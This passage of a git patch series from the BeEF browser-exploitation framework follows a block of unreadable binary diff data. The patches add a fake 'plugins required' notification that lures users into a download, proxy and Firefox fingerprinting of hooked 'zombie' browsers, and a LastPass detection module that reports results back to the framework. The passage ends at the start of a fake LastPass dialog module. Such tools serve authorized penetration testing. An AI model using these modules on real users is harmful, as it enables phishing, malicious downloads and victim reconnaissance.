z2&!H4gl-~wUEgn7M~cpMZlTgvv*DczXwOAEwhPS!5t^dKj>2bqjnR3PslN!uqRA?B
ze-YGR9yN|ChL1#xSIUVkXI8DCH!ot$Y<wLO2OIg0a&>(5hGg~+Dml(Ls#m<Hxl8L|
zs3;2Ua;+43mM*@~K+xvWYPYc^pI!Xk^iA)p^UvZxD=jWk=qYEkb*E|-_Bd#G{>?hn
zj))wj`Pf%MNe$pk2SR%+Gys0eH28eFYs^BLW^yLsg_f0s0KZg)+S;8FU#&u)I7?c#
zmYOH#22Gmmh4PkZKP9B)jsz0E<Cw!_M$euoNw&Kd8XQ!>SWNjm#o1EnEGZ|-qc~P;
zyUqE+uLF2r;~miu!&{4;$`fDuOC7=&mD>$B%^y0Wz)A}!rmEMyR~mSo1zMd(Un;;C
z>I1lL2>W;#tC)M*t$*eMlv*2g17xoR=V}Ii8>hRqrK6@ks?<-gaS9tKYn7n^WZb_D
zCA<?d3Q>LQEI%wa{VX@qekVL9yZo1l9HKReSyAA}Vpw;gB{M!&Ps1Gc?n}vDdR~P?
zE}M?{A;4B?X7j!=Xsx~XMHIc%b+{QlB0qX_0(o94j=y!Pho$2>y>zPcQG!7G-}OUY
zt6r>7W_$VQ+qD909h|*W11YPd$s5&JGS(22+k#zkA&%eO0Do1a=TPA97oIk+#c+{%
z&m6<$1CU$IIMG@d=8}Ob@c;AZ&r&LIF=Z8%zpC#wU`vY}oR?-y8`RuB@5S$BE|{7;
z^?Vsi$!!~Qxd<k0lH6*3Tvfs(e;uOh)mC<6idm1AZ%y$=m#P^atUea0ifVzRtNV+N
zbjlyQ6YZJnGy!@4n}YKO{mpBv3x$X1e(p>#WVcr!7ft%JoU=69*O0ZJ5ioK!eoeQ4
zTQRzT&_Zp>5Em8R&A*2m^zeZ=*5HR@QCc)>$$Gwq(~1H#-QwtYJ9fUFeI{R1Vf$BP
zC{6y(VubFF{N_d%d7QU%aiFWAko^s(zOn2G<8=3Xad#r`RdW<hbSa@7yR4!YMWyOV
zYw$hHhuP2ekMgViGZqV&5;o=9`1FONq3R3QHpxX5srYb6AsJMuPp@8Yq_&kLE96h!
zm}|+Mq(135#&s^rm6nP!8U$FN+t}sWxwIMZi`n_vH)XBS59woqq+|K(jt!rw1zF{B
zi`9RoF1W@Zdwy+Z7rh=PK}A}7EhV%OVd&Fm-n<7{Nd69gW6C2a>K)AYZj{#FFQm?o
z9F3GpwpN!_F<cA}36uKfFDqJ*#lkl*_*4&lYyUTZ^*fE}VYZB^&hbgv0sfM?{WCWq
zx&h^$;3_r}_jTV07TyplP~%-3qpFIq>Zh@xG5}K47g3pX*yo2mLY_xX0>PVKM(y`F
z1ON4!ZQNA}VhrK{x9NG0tnbIuUYmc^<}Li@A|O+VlC7iqAQ9<$=H*GCUpa3)O$eZ2
z_=v4iq-HxvsJHk%hYk<PGd@1tn8@}&WY}S_B}V9Agp<^e+j;mFFrUI#=@REe#T_hF
z^?o)6Z}qK@;ISIDHk$6}xXQ9bW)3=I<mG3tAk`A{Avlr#OOc`c%X+nQ^>fDkcZy(w
z&kU6XS_4$8I64&@Cye3S1_NDl6lYcR;;f}m*5B>aUzA;Eh1=9nO3&a+PHAI{DESZ_
z7Oa~fEL4}@eVB6hwz6!vxJ%LGfwExDk#=eD`th@^c7FsM0!{E50SWadN-Ey)?)PM1
z<u_--PQJ$F6+t+xPCL(fi>nrgp0@HBO$ClZenwrE$(Mpa$GH(}oM-l_!dZyKZ)Vxt
zQh1Aa2uq<YJW?wtm%R=mY>0-2v=Wk<ip>^X$dr65%~o|IELjMZQk99558i2X7%c-{
zX2G+JTRsx}a_W*~{2Hy^VUK!0^5}xIN$bggIE}8jVXu_0%aEl)497r$s{OV0%HsFP
zXLlZq`)ET&Hh0Mqx-Ql8*nU9`t?LT>Nz1vju=_x7tJF+(w%Z!(mVknaG!nC8KBXo2
zp47o2w!3FDFNi0%1-gdY{F<YQC(5U%6s@Czrgp<GS-)trW&1ERzyAIRK!v9i*1yXn
z_<1r=lCckjJ1H>j*S+i@{-Vzm%JeOWZcpY0NCH9s?n6D;mfp*rzaIwBI~VE~&fvr6
zofFAMCLfJ?QT$@{T!}8RszZ(5LQlfKS1xMMGFH9CFUa=gJXVI($~51H5iogEvn(=^
z%)9W7$f_-ptn?Z9q5gQMA_ys%gpB_~>=Yv9<r4#N<>b#LWs?RUn9LqjeW;_Qf*@nx
zbCEMkg7NjgN_N)6g5D7>b7jB+=Il$El=_QT|ECbbuQk>(VsHLOjj^>hv(t$76_36V
z?}ub&h;z2JpOl|c`G`01l`o1YCuhMMI3!#E-J8$y2$Y)o8*Iz@c*5kT?UR2Ld$Tl~
z@XzwFs|AsP2FeD>oNf(hrl}kyBzQdkF6Q)a$0r8NY-pJWsmC{w?zFbPkBo-OT5tkV
zs(hQB!~u*V6Ri4LAywCNA39I3mtU>0PB!0j2C#@N>^Vswm63PU$l^INzUPSOo7Ko^
z$D&=kMIu$EWJUK#MjlGv^;zv>`_KztUKd#8vHLHV76-0W3M_HVPkI<5)2UkarT-tq
z;(s`cthL~1V%#TeDp)6bNCMT<I29f`Ae!j9<&tTSKBM4W9c=Aq4_*<3xl_X|7IOhO
zEe*&fIRJHx`bpmfnOZ|(cP}X6*!C}x6WQP%{YNh;Qw_uqXEY<O(aacC4y<#b8(}Y%
z*3cQc?1d;q@rnS)$~wC3L1MjtEA3uAT%M53AF7y04<dqFnwV>dXEXaPFg8*w&pM!}
zo>*@eQIZFpTZJcrWd1^XL`USH7)ou+u#&~W75s>f%rs>H^I%9cIXxDI`%{AM@7ob$
z&Yv%mdQ^67Sh~(-OI*Aq1R2^9vW*Cm4%9IrQv(Pq8}|4>fv0xo!=WCiC4R+{oOGZh
z#01UACQ2R;Ufti0+V&dY&bnfOKq1o7%b>EA`X{A~%PqvB2yj!G0nL|n{?r`eoW-y%
zf?xiNfvSIuNU6U$Z0!}jUqP}S!oV3-4QW<pw;wQdd!&geQOdly&S<@8v7?j6NVa;f
z_(wVZ8IVYHjdZWrcI~~)T#qpFaj?$vI#f@=8$uaL-CUmEy$JS^<^HHZU6#I&j!I?R
zuqu7+sz*j^Uu8uf7plxyp%x!hQM<rD(hap#cZ*u+qbrKeC*eI%SQ|Ng^UJtFWIz}E
zy`Jt-_d?fAC#K)(r8>B7kOrNDX9a%?hfEof!z+o?;NHm8BKMG4m{>>GI+6?9jquE&
z?=!M&#bMC0G0L7Im?}Q#^`D;NVA~g&7U4KDr!YAWF)N!A81i-@u&G>fXbx5CBT}0g
zs+=YXvu(>{{YGR#cOPbQFTI_h&>vdnM<F8^R&)r5pwB1I0fi;#33y~w5zGS&$O--3
zqS~qqoN}Lbw0DGgC5H(XcsnB(qy!GLV$mPPEf|1y+P;YwZaFhLICZ%_JeUJqG>9{d
z{o0z`{i>(Z_2I$biUn^iuRvi*MqSc%QOGD<)!z~{Hu^shjJRbi``(R0XyrZH?>Pms
zf|de-2Q3_S8U?*GLJKzY#b6RrBDiEk5F1|&`jw+W2@%$_FktU665do(5v;brWg57J
z)A5Am93SB*o(uYGSv9pmDxHj>l&8FU-ETtkodlr>*6~|blf#q{m8ZW)bnUuVQ8`CI
z!y=x&!H{<57H7NPP7Q}K!79~5mFrCVFSjKgJO=~DsJ=ydh|S*&HVdZaF;Xro14V8c
zmaum>&fqBMh??~}DZ1{{U6`U%vdZYpJ&?LY3@U1>DnxrE6Jg4Yl=aMjeIN>;dqV%D
ziNoDuE*w6#`a0^>{JT9{(yvS29T$f-7gv~>MmJcX(puT)6mM9SCl^tCd<anoTKwVX
z3CV-IrtFQHDp_1%Lgao?rmRd}=zp?neGhgLUm+{FQuGQ4loo*S!**_>2>}((*#pP|
zpBbr(Q=fr?V^M*C+#unf)1s3K0BT?p&@ld8Ze5mwYx?sp$<tffeQh^%;n+?kXtZYa
zpKh%21EhRQ&S%(n8~t)#c0(E}e5bz6FRBz>`M{rrFUi%Jc3sw?5jp2?sz#F*%kHi#
zMyaX07^cJ*iP(*vh(4;d<<!f={c%;EHziA~n)x_E7e65N4R^oB3C+;Sqd@B|=1znM
zw1g}|#}W28Wq?xBK5hu9J1H{+yG%V%NDy>Gnzl?nFaQ_;&E4n4X&=1MBs{XJVV>)T
zX97eJv7-|7t8frwap1%kjHpGy2glG+qg{q{+|CrQbqk$<{UJqdGHP8YczSm3D|IBr
zy}U!B64kFPop;r!y1y|P$@R}QyG~!JGki{#|Nm(F|7P5pQp7#kQEqelj0?i9AM+u#
zFBR%J_YCAaR8RU<TOoa8G6s!)Y;`9e{0<x8cK%{Izr}f%-VUl}3;*Y6mH!M$<F=6Q
zGG#Peqb!oNHHIPi<<v~8AyQNTn@P^ulyIzqX?Z)>D^+Obae)6-X;WV)`cZq60CYaZ
z=+`~tEeO(V8b!jHlH11Kp2?DB8?{lZi^g*LpNmUh2vq5L{}pqN^G9zH3JsEEkmuVT
zaPUS<`fG}ssAKp-@yxn#9g-S>mDqgJ5gt?a?F${LqZ+Ek@FUS^SLA7QZB^L)q4!Q6
z<e;m~5tpAsR?F;2Kyjo=mhstNb5u_;@UjsA*@aZ9IryIx!{TDA;2jOeKjwaZ<+Ktd
zy1S5fV%8^`m2W?UC8R&8CJ}0kMA$<2TKQX_uz|5VWduKjeC~oz+IYXn+Sqy~kSmPB
zv%0y*bUe^_S;EAWK=^}2BW9Bgo?qV>u0|n(tHG7|`k&C>PHE)Jh7G^@W>^S8nfDU_
z0*%$4ly(7EMh{DmWw}=~bZo1-qY>JJM19W`tme(%H_S`E%p$(N+kO8-9Lk7O{@>-L
zw)L3osgD<PQ&ypTnB7b>hjCDvV0P?X1jRvGYE=8!%hVuthPvBNgONCF*%yfm-U^lK
z`N*CbRzj#aJ(u-!PSxNg>J7ihwA9?*%lMSQJo!PF2qaMsnv_R6nPcN#U3Bc|CmX@3
zdwlL~lJGagUAaJ4Ph+D?SC}#QE}y@frCo<w^A#x1L2ZU^IAZSx?62p<QLfY}@QwY;
z)5l&)Z+4`Q9vk9HSbX0SW!6@GQJ#(=-3c#@^c`Kq>Uaw$^v^-$DRMpumtWxz_ynBL
zP&+GH;Y9_ncmmyGGI-UTV1f|eV5I1BE8t+UgoZ*f=P3^3k8hnxqcQ{4!?h6Y?X<Qw
zd~#)Amc19^FQpJU5Ys_HH1Way%X`$1qCb}fxhE>5i16R7Q0e7rN|i6UE>UPIo!}$F
ztcSVg(|xG={Za{!BDPOh)-X-L>?BxyN5(#OFvR`n^XzgpQXowafqnEDZSIX}?4beC
zoZNO|rYII|^!#9e3WOoK*p={H+Q#DgFpta*P6jK>4IAYHBmQl%Y*d3MQ1q|+@<lv?
z2!Iwj3H}VPhQ!YCQ235jV9S<Hq{=J~BE}0QP{g3Yjjr=+!EnfUwaK$LG5*8^ztkW1
zCbRHQV0S0D4T7XlmDJbvq`!UPj6rJ5D;~CqLL=kLEfUqpFqBCEsNA<qDIw=lspEbl
z#Fsnswvfk0w3|R$kG?7f--Vj7x5oaGxrl*Y0D`~Nu6-Ui3SC16(4!ZUaOG)-#|zJ^
zatK4uK488*rO1m`fLSpyipv@gwhdjNft%i<ORuRjwDi0Yo#Sd;m^3EAAB&iegXy2p
z0dqsDs>E*^8Sx})c}10ilj>i||43rBbzPDkR0x|$<Len>zok#l`6wsg$(-xWoAMmX
z*nF_153{7lfb)Wm%#HnM!~<mMaWX@&;R3O=S!~tVDNBIQGr{xUl$aUK^EDi$BE=9?
zfe8n-ljF-g9j`HfFCt}hkOi&hejdDS_H=XP2u*2K;Dn^i)kb2q*^gqW0dR({tKzkH
zGdUHWiveN|pT5stZOgp$^YY?Q=mK0VAPar(RzN?uxD2`Z!b5&FaTA;zm`%*{7i@-a
z5WNfCeWo$R{d#zoz(e^~a+RJ72IxXE^n(&poSh@Jmxkw-;34|Ch-HOALu-HB0M3m2
ziXv7~$Di{rW}1?>2Tc;`9%B0o^wBdhO8$@S^2b!*schH~z0^V<fwg?i&9*lxBM!fr
zTjWJe3Gvoc&jg!%j}u?x^?sYZPvms=ELdQu<ln9=E0N}Q?b=#^*$zq)!Cp*NUK}7K
zIa<mij>9?C%_cGxj+vmV%p%67^-Y8(0usrG(E%?*5QC+SQcn4mi9TQH$U1sHCxENZ
zAdo6%88H@~36Jgj_Ped2r+%4Q@=b)Wek@(7LZt?s)oo*!K5?t&h%s9BR~8+(m89c$
z?NDt8bt68mB}tI30FPoW4FpSL?EtErQ?zPk%uv~cV71hsEm9YgB^*HDip)S7(nH^`
z%v)on&C8Kmr~jpxme)lzG3hHpuyVA4?yU$KP?lBIZme9`j0RURvDpz?L0p6M2G-ul
znW+1Pex9h4WN%Y@%b6xK*Cs2fQ7YumPZ-QhW$oCg_mS6u*t*`ZI`Y2E?OEPs{(Ovz
zcuu8b?u-m$<e}x`HtjG!8wf9LSCcHq40@+>O;}NWrKic<@JX!yNIckDXVlg?_q=;L
zN2?_*hU#+K5zzwe7D4|;SRwY?(`r@8pBY!g*YSi0$#LwA(NCGdV}OMYVg1V#czdJ5
z@#<jXrRAr9_A_IBn&TrBbVtHpIK%dS0!fnumcrvD1zUv$Jj^nCH3hUZYS9LN8`zP?
zP7YWav}<r`lgrnjzk=z!%xSOz5!&L2@E`C1o~)5do#ec9{%PiLNR#FL`r}Thi1v}?
zr#KBqFHyF|dcLK)1iCyTRzbqD@~8AjeU3eKwf%B%vA~ooRhd#I)_AW5MnqdYtBQSE
z`M8B#&$<v!yFfWrlv0~-G<flPZkt%V?vFE}(xuuszkDX6>Z<8^8PMCpQQ3ap&nmxs
zT}eSCf)~KP-aSk7%KLy7&3vz!SJ0em8Yl3BkOvEniREz`eGbo~Upk^6J+V8NwjT+R
z$}9L6tNmSp@o7vHq}WfyNy*C%kzxXX`if)09y&)1ZyHRx*^9d7kuIOg#K;uBdh@5W
zTOrZ_3HXie2LKsb&!Qtcv4*;KqnpXnqq<v6qXmp}cY`UFvsDAz*D%ctP;5TiH=$dN
z^@kbCz_XW-VTmI`hNR(xk^OP2%A6AQvY2$WF7SLgR+Jdn?H+z|g#)0W--KRy&j)^D
z{Kn1Oh3oE5@7KNte*TzJ<nU(*b)04cOrQ+1{UC13qZ~93PEIa0w3{)+XBoSaUwG-R
z&H96v4^UqYO8yhShT|3_K6mg8g2zBaMPt!y^o%t`?;me3mP5@FgGQKG*9Izc1+x-D
z(BXhCh!T|F8}*}q>{UGdh1daJ1y&dXm>XhI5<CSVe9Dojhl2=;*1NtW>)*e97FW|{
zXRRXLy|W+ujV8zjUrE<5FlN}++?7w_0neTTH*Oj4DQ3-PwJ8UL)JsO$;_-f1{LR7h
z{V;*V$kYnm9W(F0cuoj652uu1-xu#6{zUJ`vXTf>V_s(sR|PsD{<g0Xa2>hd^=q^c
zP&YcNGITYxD21RK5|o_w(*)>D7LQJ}cM{O!yeuAhNRYU(y0203L4ti6FDMYP?iIij
zIv5*YBEctrA*rFF!OP3YhdKb8<qlt<qr5bV)88>26x#=X^{{(HB0~#okqNcqS%zBz
zbpw)ht|JYS1fW=&+0T{T+Xko1=8B?|!(f8O#Ai$R``FOCaI+)hEIb$frJ&KNlREh}
zqX(SKoRYr0$?6XL>1uR`N%_Lyq|ITxD8zYRr~l*pHku51;T}LqRe{?YFhBZ9lK7dZ
zgI3)+otyHBDmr_o3Cs8t@w29*)&T?9+-jGm@m9>@$G0nLTNDDc|EA%=_qn3L|MrUx
z=7Bo>l*@-7;*)x{V?XQ_tm%BD(p%N~fy1MLsLVny)2m~2q)BxdW>_DGsXED{*)0Vx
zCSFD`gfb@`c#Pxlxb&{oueAbS#K&y0Q39Z!9R7fYE-fqlrxPluN{V@XKrmiWZ*}2`
z!|&i_?8f~T6-|ng{{tM2v}X|vEs_6v7v5IAUuiD)L(UPu&qo^<q!UY*PZ^Pd;+8i^
zPYny@cvqvwH8tX3yO1)k{$By)2OId<GN6kyfFuK@*lCqky@hS#@dChA8Stn?3R#MN
z%7HEU=0Eh&Q=^ogC&CBURDA_cu^>Lk&<>S2P$mUq;ETuvb46s5?&-#FR%%wbmk08S
z$&}HeKB{zw;${JO+()2WC^w@T$k76>7udwdrf77Lx=hK!3djIUwQ~)AIsULfKKbk{
z;40o0@TgZt?U8;&da7d3a?PDkp%^^!!$bVbM<;BkjqW6e-(y$Vuc1HMK6Kaa)YXmB
zG!%fi9x8BBjHJN|CyEDDxkBx-t0sbg7J(T;m7H~=L!(AT#}>sPQrso*Lx`9fEhSb8
ziZg$d?-w&>!X?x|o#z08*PoGMBP5Ph%7#|$z21hd<>^SgdlhT`TnJi<4rx~k++0Bv
zKt}8#F(^Fni30i(LBA`lGb#lB=$au_&4Y3ezJzXSFk<0G@2WB6{dV07*oP2frKO2o
zAO#TXNZ^<UZ=pMyV?IP0F#msq-swl_o&q~hOVK!l5fo6BXTo}LC#H=8T7o!F{qX$;
zU7ej7qWSB?=*$-0J#{3=$LpX(!xbj2?i1Zp;u3hKF;#zJ1W`?QhEqVu#f0({CRa`c
z<sn5*h3~yLO4U;!?&1%6;x&!L>hhhVR53qN&d7e~cj<*=enR5KEK<NKuq7%YE#OWm
zaei%eLSrpCNrnP~-1tP-jer)7yBI^7_-&d{QQy@hzmM)0&l2Gi5xAw=Rzjqm-z79W
zX48Zr^L7e63TbOm&>GK?2(gWUGwGD4-^C9e>6ose`6J{!l9T3%_gB9ukPhk>+N}0U
zb~4(|iW0CE$u@MtnQ8)Ky?&EGTBU(Gz!3pDx{i-oBqv|#h*&3T6YUm2;mkY%7ty%M
z*l3E$J~#_Z_Dld!0K=o=-kN7Yw}Os`0?7`9s`(M16f?+N4+Vl~?g-dbZ7^X1VuNWX
zF0GzK0EHM+I^Jzo1pEbk4)fH3b3Xb?joPda`llCT=dcLCaqv_rfj*&ws<@2!pX-!#
zNx)EK&y>dHDVveq@?-o#EhbQuPNwPOD8Gtg3os1x)mM&0WmT%JWGp+PXPcVs_91}Q
zYOl{N`lvad7u(PK9poHpi%Hd$3dw~v$)n%>My@-$cC1T5e<}c~=C<yx_C&SL)E0qM
z4u<M{=51DEkKEb?;(ID;V5h}7$pX|xymFx3>sSQ_l(T}QN9tR|4)k<c(O|vSS!k~V
zmja!nSFs*O^CgG;^u3Rt##1lX(eO_Pfiz^5XHcZW;pf(?C4rU%S`uhUpe2Ep1X>bU
zy#(Aniyi9VN60Ueli|LK``h{w|0l*S<oC(f^;6|E^6r@}+EGj4r#9<RxeXQll`o@(
zKoxNgyEXYDT@=%*V6PW?_A(5r#S=1MbYsN{V%q38PhC<vy_fZn<1OD_b#;Ap&e=QK
z30qkg+Kfc6g2!`;9ppR)e^J-W1DMEfZU<G-LcX#EhNw5$q4se-@pBZzbpjwMuJD2|
zx}-`OD5C)<-?K^ZdBrf&OZ^mPq*5I6&%}C>@8)$yRT9P1gcPG_!x#Cz`d$l=G*M}C
z)Yw@?8&u0kU`(36u=g!-ns)rvk-8QH2QRG=%7I9}fkC7~%%Nn4yQ-drf=sk<Dzb-Y
z`|^oZqZBYrwSn}FV!%!SFA-h5c948g#W7L#f&wQ`E>MjiU0-Eeyne2BAJ<BHAj_yU
zOPtlCeoD4_h14%)Gr=h8W|y!*?GhH8Se@TZp9=!DSosyX#t9YZR?N<KHPl~}ij<B4
zpa91BLcG7^bBj%-ddJEDirNz|jD`rnmDLxi<1jq_Ix&35?xDr6^%V!Dqn#gLJ$B;b
z&$Zu&_Js+jS8a>p_BS41d%wmu)P8O}e|7yF>mG4C8{1g>{hG>gw0o_t4Qq7m=mN2V
zG|IAK*cvVt%dGMEcwCx|Nv#}e<y;f6)s1ECE#u?k@0w|$2Zs&q9PPZu`;Q{42oI>&
zG4DsM0@j>dx!)*?G@Aa8)}LnWYSjJsbM5<BV?WyXG|sJf%$m)sHJQs*d(tph*Jh%P
z)tP_c@3CCMb8+OjS8f$`-j9!+f+o5*mbF|{G1ThuSl4Ve&zjAf+Ob*FYc{qw!nSq!
ziW3xzq}i~nsl94!PqTTvI+=_$@Bf7=)4Ehk0xb!&B+!yTO9Cwk{Qq16jXrN<7%*C#
zI*LCd$izde8h^!E(qqL>jbd)}cN%=xaQ*s=M&yvl%@s>NV(!P+t~n=WZr84(`4uBZ
zb^N=FqsB+9bJ14guhpF=kGiI*m49-OFCy28CuWsL*#*&wjj8@4hDFz@X=_}<W#oDF
z10H4kRi$6sIFAIX4IkB|9wl_F8`37@8EHzKRJi(yHk$ve>x#T28S>|Ka<#~+s}Vap
zkwD}GC%L$U{66t`Bv#z^rjWZ5%cb>R1*2MWY3W64KD6dT%MP^cK+6ua>_E#7wCq63
z4z%n*%MP^cK+6ua?7+X-4meB5nO6J@7EoSjk2VcbW>v^&^SVa?U?b&CtShhO>`8dO
zz?-<}=etGN*}u6rEflJS!nIIH$DCVF*Vfaur3bBf(6R$9JJ7NNEj!S%11&qyvI8wU
z(6R$9J5Xx}#2`{J@qr-<XsZ}E6)oBv;EB@Klol9oYv;6|zy?yPo6sSp5dME1KB~e-
S8zIsF0000<MNUMnLSTXtSU&dv

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_c/module.rb b/modules/social_engineering/fake_notification_c/module.rb
new file mode 100644
index 000000000..1f8deb455
--- /dev/null
+++ b/modules/social_engineering/fake_notification_c/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_c < BeEF::Core::Command
+
+  def self.options
+    return [
+      {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "Additional plugins are required to display all the media on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

From dd811ca234645cbb5c81e1c4737f6cb83ddfed40 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 8 Jul 2013 00:25:49 +0930
Subject: [PATCH 349/397] Add proxy detection using http headers to browser
 details

Add proxy details to browser log

Part of issue #527

Note: does not work for transparent proxies
---
 core/main/handlers/browserdetails.rb | 51 ++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)

diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 46a3b610d..7f851c923 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)

From 2c2b9a85f4d3b52da1ef9d6c6a4a0a63843efa31 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 8 Jul 2013 10:57:02 +0930
Subject: [PATCH 350/397] Update browser fingerprinting module firefox
 signatures

---
 modules/browser/browser_fingerprinting/command.js | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js
index e60b5df5e..20a959d08 100644
--- a/modules/browser/browser_fingerprinting/command.js
+++ b/modules/browser/browser_fingerprinting/command.js
@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

From 82a70fbcd04ade79a0fab17f290c3fdf57a5abb7 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 20 Jul 2013 13:58:20 +0800
Subject: [PATCH 351/397] Detect LastPass module (except on IE) - #802

---
 modules/browser/detect_lastpass/command.js  | 29 +++++++++++++++++++++
 modules/browser/detect_lastpass/config.yaml | 16 ++++++++++++
 modules/browser/detect_lastpass/module.rb   | 14 ++++++++++
 3 files changed, 59 insertions(+)
 create mode 100644 modules/browser/detect_lastpass/command.js
 create mode 100644 modules/browser/detect_lastpass/config.yaml
 create mode 100644 modules/browser/detect_lastpass/module.rb

diff --git a/modules/browser/detect_lastpass/command.js b/modules/browser/detect_lastpass/command.js
new file mode 100644
index 000000000..9486b9210
--- /dev/null
+++ b/modules/browser/detect_lastpass/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+
diff --git a/modules/browser/detect_lastpass/config.yaml b/modules/browser/detect_lastpass/config.yaml
new file mode 100644
index 000000000..f3ccd28d8
--- /dev/null
+++ b/modules/browser/detect_lastpass/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]
diff --git a/modules/browser/detect_lastpass/module.rb b/modules/browser/detect_lastpass/module.rb
new file mode 100644
index 000000000..6a331adfe
--- /dev/null
+++ b/modules/browser/detect_lastpass/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

From 7f64c94e03c72027956d65239dbde1bd02647a7d Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 21 Jul 2013 13:53:44 +0800
Subject: [PATCH 352/397] New Module - Fake LastPass Dialog

---
 .../fake_lastpass/command.js                  |  39 ++++
 .../fake_lastpass/config.yaml                 |  15 ++
